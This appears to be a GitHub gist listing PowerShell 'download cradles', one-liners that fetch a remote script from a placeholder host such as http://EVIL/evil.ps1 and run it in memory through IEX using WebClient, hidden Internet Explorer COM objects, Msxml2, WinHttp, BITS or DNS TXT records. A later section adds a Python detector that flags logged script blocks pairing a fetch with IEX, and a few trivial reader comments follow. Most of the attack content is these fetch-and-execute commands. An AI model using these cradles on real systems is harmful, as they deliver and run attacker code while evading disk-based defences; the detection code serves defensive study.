
Last active September 16, 2024 18:36
Download Cradles
# normal download cradle
IEX (New-Object Net.Webclient).downloadstring("http://EVIL/evil.ps1")
# PowerShell 3.0+
IEX (iwr 'http://EVIL/evil.ps1')
# hidden IE com object
$ie=New-Object -comobject InternetExplorer.Application;$ie.visible=$False;$ie.navigate('http://EVIL/evil.ps1');start-sleep -s 5;$r=$ie.Document.body.innerHTML;$ie.quit();IEX $r
# Msxml2.XMLHTTP COM object
$h=New-Object -ComObject Msxml2.XMLHTTP;$h.open('GET','http://EVIL/evil.ps1',$false);$h.send();iex $h.responseText
# WinHttp COM object (not proxy aware!)
$h=new-object -com WinHttp.WinHttpRequest.5.1;$h.open('GET','http://EVIL/evil.ps1',$false);$h.send();iex $h.responseText
# using bitstransfer- touches disk!
Import-Module bitstransfer;Start-BitsTransfer 'http://EVIL/evil.ps1' $env:temp\t;$r=gc $env:temp\t;rm $env:temp\t; iex $r
# DNS TXT approach from PowerBreach (
# code to execute needs to be a base64 encoded string stored in a TXT record
IEX ([System.Text.Encoding]::UTF8.GetString([System.Convert]::FromBase64String(((nslookup -querytype=txt "SERVER" | Select -Pattern '"*"') -split '"'[0]))))
# from @subtee -
<?xml version="1.0"?>
$a = New-Object System.Xml.XmlDocument
$a.command.a.execute | iex
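
For defenders: every cradle above pairs a network fetch with `IEX`, so PowerShell script block logs (event ID 4104) can be triaged for that co-occurrence. The following is an added example, not part of the original gist; the family names, the `classify` function and the sample strings are constructed for illustration, and literal matching like this will miss obfuscated variants.

```python
import re

# Fetch primitives used by the cradles in this gist (case-insensitive).
FETCHERS = {
    "Net.WebClient": r"Net\.WebClient\b.*\bDownloadString\b",
    "Invoke-WebRequest": r"\b(?:iwr|Invoke-WebRequest)\b",
    "IE COM": r"InternetExplorer\.Application",
    "Msxml2.XMLHTTP": r"Msxml2\.XMLHTTP",
    "WinHttpRequest": r"WinHttp\.WinHttpRequest",
    "BITS": r"\bStart-BitsTransfer\b",
    "DNS TXT": r"\bnslookup\b[^|;]*=\s*txt\b",
    "XmlDocument": r"System\.Xml\.XmlDocument",
}
FETCH_RE = {n: re.compile(p, re.I | re.S) for n, p in FETCHERS.items()}
# Execution sink: fetched text handed to Invoke-Expression or its alias.
SINK = re.compile(r"\b(?:iex|Invoke-Expression)\b", re.I)


def classify(script_block_text):
    """Return fetch families present, but only when an IEX sink co-occurs."""
    if not SINK.search(script_block_text):
        return []
    return [n for n, rx in FETCH_RE.items() if rx.search(script_block_text)]


# Constructed ScriptBlockText values (not real logs); EVIL is the gist's placeholder.
SAMPLES = [
    'IEX (New-Object Net.Webclient).downloadstring("http://EVIL/evil.ps1")',
    r"Start-BitsTransfer 'http://EVIL/evil.ps1' $env:temp\t;$r=gc $env:temp\t;iex $r",
    "$h=New-Object -ComObject Msxml2.XMLHTTP;$h.send();iex $h.responseText",
    "Invoke-WebRequest https://example.com/tool.zip -OutFile tool.zip",  # fetch only
    'Invoke-Expression "Get-Date"',  # sink only
]

if __name__ == "__main__":
    for text in SAMPLES:
        hits = classify(text)
        print(("ALERT " + ",".join(hits)) if hits else "ok", "|", text[:60])
```

Requiring both a fetch and a sink keeps ordinary downloads and ordinary `Invoke-Expression` use out of the alert queue.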
scg4508 commented Jul 4, 2023


harethe commented Jul 10, 2023

hg$hf bvf vfgot


geekecom commented Dec 9, 2023


Copy link

goodstuff. Eat that Fluff
